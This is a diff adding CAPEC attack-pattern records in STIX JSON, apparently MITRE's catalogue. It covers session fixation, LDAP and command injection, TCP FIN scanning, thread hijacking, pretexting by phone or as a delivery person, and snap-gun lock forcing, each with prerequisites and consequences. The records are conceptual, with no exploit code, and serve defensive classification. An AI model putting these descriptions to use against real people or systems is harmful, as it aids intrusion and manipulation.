"type": "attack-pattern",
"id": "attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)",
"description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/205.html",
"external_id": "CAPEC-205"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5.json
+46
View File
@@ -0,0 +1,46 @@
{
"type": "bundle",
"id": "bundle--26959e1c-4fc1-4ac1-a78d-2bc22fbeb341",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Compromising Emanations Attack",
"description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/623.html",
"external_id": "CAPEC-623"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/201.html",
"external_id": "CWE-201"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Read Data (Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance.)"
]
},
"x_capec_prerequisites": [
"Proximal access to the device."
],
"x_capec_skills_required": {
"High": "Sophisticated attack."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94.json
+67
View File
@@ -0,0 +1,67 @@
{
"type": "bundle",
"id": "bundle--654a62b2-dce7-4c28-91af-16794e7b5820",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Hijacking a Privileged Thread of Execution",
"description": "Adversaries can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. This can allow the adversary to access functionality the system's designer didn't intend for them to, but they may also go undetected or deny other users essential services in a catastrophic (or insidiously subtle) way.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/30.html",
"external_id": "CAPEC-30"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/270.html",
"external_id": "CWE-270"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Gain Privileges",
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_example_instances": [
"Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users",
"In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread.This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such.This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute."
],
"x_capec_resources_required": [
"\n <xhtml:p>None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.</xhtml:p>\n <xhtml:p>The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.</xhtml:p>\n "
],
"x_capec_skills_required": {
"High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58.json
+38
View File
@@ -0,0 +1,38 @@
{
"type": "bundle",
"id": "bundle--252e3455-f592-4f64-9ee2-c2b6cb3937db",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2018-05-31T00:00:00.000Z",
"modified": "2018-05-31T00:00:00.000Z",
"name": "Alternative Execution Due to Deceptive Filenames",
"description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/635.html",
"external_id": "CAPEC-635"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/162.html",
"external_id": "CWE-162"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_prerequisites": [
"The use of the file must be controlled by the file extension."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--11c647fb-33fc-444c-b578-617cb2205def.json
+82
View File
@@ -0,0 +1,82 @@
{
"type": "bundle",
"id": "bundle--8ec3e378-f31d-467d-9e65-9b766f0d9276",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Session Fixation",
"description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/61.html",
"external_id": "CAPEC-61"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/384.html",
"external_id": "CWE-384"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/361.html",
"external_id": "CWE-361"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/664.html",
"external_id": "CWE-664"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/732.html",
"external_id": "CWE-732"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Confidentiality": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.",
"An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182"
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"Session identifiers that remain unchanged when the privilege levels change.",
"Permissive session management mechanism that accepts random user-generated session identifiers",
"Predictable session identifiers"
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Low": "Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73.json
+61
View File
@@ -0,0 +1,61 @@
{
"type": "bundle",
"id": "bundle--9a82eb48-46aa-42df-93dd-9e65d633c09c",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Enumerate Mail Exchange (MX) Records",
"description": "An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/290.html",
"external_id": "CAPEC-290"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/200.html",
"external_id": "CWE-200"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Authorization": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Confidentiality": [
"Other",
"Bypass Protection Mechanism",
"Hide Activities"
]
},
"x_capec_prerequisites": [
"The adversary requires access to a DNS server that will return the MX records for a network."
],
"x_capec_resources_required": [
"A command-line utility or other application capable of sending requests to the DNS server is necessary."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0.json
+34
View File
@@ -0,0 +1,34 @@
{
"type": "bundle",
"id": "bundle--2570a0c3-4da9-4801-8679-08e013a05091",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Modify Shared File",
"description": "An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/562.html",
"external_id": "CAPEC-562"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/284.html",
"external_id": "CWE-284"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e.json
+34
View File
@@ -0,0 +1,34 @@
{
"type": "bundle",
"id": "bundle--1a674f3a-135f-4ee3-bd4a-3b4cabc6ff61",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Obstruction",
"description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or even to fail.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/607.html",
"external_id": "CAPEC-607"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Availability": [
"Resource Consumption"
]
},
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953.json
+34
View File
@@ -0,0 +1,34 @@
{
"type": "bundle",
"id": "bundle--40320aeb-d711-4f53-a1d0-adad84681435",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Using a Snap Gun Lock to Force a Lock",
"description": "An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/394.html",
"external_id": "CAPEC-394"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6.json
+50
View File
@@ -0,0 +1,50 @@
{
"type": "bundle",
"id": "bundle--e26ec018-ebf0-47b0-80d6-a295bd7b9dee",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "Command Injection",
"description": "An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/248.html",
"external_id": "CAPEC-248"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/77.html",
"external_id": "CWE-77"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Availability": [
"Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)"
],
"Confidentiality": [
"Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)"
],
"Integrity": [
"Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The target application must accept input from the user and then use this input in the construction of commands to be executed. In virtually all cases, this is some form of string input that is concatenated to a constant string defined by the application to form the full command to be executed."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464.json
+89
View File
@@ -0,0 +1,89 @@
{
"type": "bundle",
"id": "bundle--8037c9ba-ef3a-49bc-83bd-50f22b23a9b1",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "LDAP Injection",
"description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/136.html",
"external_id": "CAPEC-136"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/77.html",
"external_id": "CWE-77"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/90.html",
"external_id": "CWE-90"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
},
{
"source_name": "reference_from_CAPEC",
"description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)",
"url": "http://projects.webappsec.org/LDAP-Injection",
"external_id": "REF-17"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism"
],
"Accountability": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Gain Privileges",
"Bypass Protection Mechanism"
],
"Availability": [
"Unreliable Execution"
],
"Confidentiality": [
"Read Data"
],
"Integrity": [
"Modify Data"
],
"Non-Repudiation": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301"
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed."
],
"x_capec_skills_required": {
"Medium": "The attacker needs to have knowledge of LDAP, especially its query syntax."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3.json
+78
View File
@@ -0,0 +1,78 @@
{
"type": "bundle",
"id": "bundle--55eab144-07ab-4434-a97d-ca1bb151d9f1",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "TCP FIN Scan",
"description": "An adversary uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow the adversary to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed in comparison with other types of scans, the major advantage a TCP FIN Scan is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link. FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/302.html",
"external_id": "CAPEC-302"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/200.html",
"external_id": "CWE-200"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
},
{
"source_name": "reference_from_CAPEC",
"description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
"url": "http://www.faqs.org/rfcs/rfc793.html",
"external_id": "REF-128"
},
{
"source_name": "reference_from_CAPEC",
"description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7",
"external_id": "REF-147"
},
{
"source_name": "reference_from_CAPEC",
"description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997",
"url": "http://phrack.org/issues/51/11.html",
"external_id": "REF-130"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Authorization": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Confidentiality": [
"Other",
"Bypass Protection Mechanism",
"Hide Activities"
]
},
"x_capec_prerequisites": [
"FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."
],
"x_capec_resources_required": [
"This attack pattern requires the ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd.json
+36
View File
@@ -0,0 +1,36 @@
{
"type": "bundle",
"id": "bundle--6c648dab-3f4e-4c80-961c-83ea84525069",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Pretexting via Delivery Person",
"description": "An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and \"deliveries\" in order to be able to pull it off.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/414.html",
"external_id": "CAPEC-414"
},
{
"source_name": "reference_from_CAPEC",
"description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
"url": "http://www.social-engineer.org",
"external_id": "REF-348"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18.json
+36
View File
@@ -0,0 +1,36 @@
{
"type": "bundle",
"id": "bundle--b09aebbc-594f-4ad4-801f-704fb16a7e04",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Pretexting via Phone",
"description": "An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/415.html",
"external_id": "CAPEC-415"
},
{
"source_name": "reference_from_CAPEC",
"description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
"url": "http://www.social-engineer.org",
"external_id": "REF-348"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe.json
+77
View File
@@ -0,0 +1,77 @@
{
"type": "bundle",
"id": "bundle--e143b97f-11b1-4e12-955e-8ae323cdcac0",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Web Application Fingerprinting",
"description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/170.html",
"external_id": "CAPEC-170"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/497.html",
"external_id": "CWE-497"
},
{
"source_name": "reference_from_CAPEC",
"description": "Saumil Shah, An Introduction to HTTP fingerprinting",
"url": "http://www.net-square.com/httprint_paper.html",
"external_id": "REF-36"
},
{
"source_name": "reference_from_CAPEC",
"description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)",
"url": "http://www.owasp.org/index.php/Testing_for_Web_Application_Fingerprint_%28OWASP-IG-004%29",
"external_id": "REF-37"
},
{
"source_name": "reference_from_CAPEC",
"description": "HTTP 1.1 Specification (RFC 2616), IETF RFC",
"url": "http://www.ietf.org/rfc/rfc2616.txt",
"external_id": "REF-38"
},
{
"source_name": "reference_from_CAPEC",
"description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)",
"url": "http://projects.webappsec.org/Fingerprinting",
"external_id": "REF-39"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Other (Information Leakage)"
]
},
"x_capec_example_instances": [
